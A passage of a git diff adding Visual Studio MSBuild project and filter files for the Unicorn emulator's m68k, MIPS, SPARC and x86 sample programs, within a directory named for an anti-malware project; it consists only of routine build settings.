<AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj.filters new file mode 100644 index 0000000..033b3c0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_m68k.c" /> + 
</ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj new file mode 100644 index 0000000..32c1732 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{E34ECD90-3977-4A4B-9641-4D7F1766E9FD}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_mips</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + 
<PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" 
Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + 
</ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_mips.c" /> + </ItemGroup> + <Import 
Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj.filters new file mode 100644 index 0000000..9551457 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_mips/sample_mips.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_mips.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj new file mode 100644 index 0000000..2f4ed55 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + 
<ProjectGuid>{A25CA34D-2F64-442B-A5D3-B13CB56C9957}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_sparc</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup 
Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + 
<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + 
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_sparc.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj.filters new file mode 100644 index 0000000..306de23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_sparc/sample_sparc.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_sparc.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj 
b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj new file mode 100644 index 0000000..bfb2b1f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_x86/sample_x86.vcxproj @@ -0,0 +1,193 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F8053D66-8267-433A-BF2C-E07E2298C338}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_x86</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" 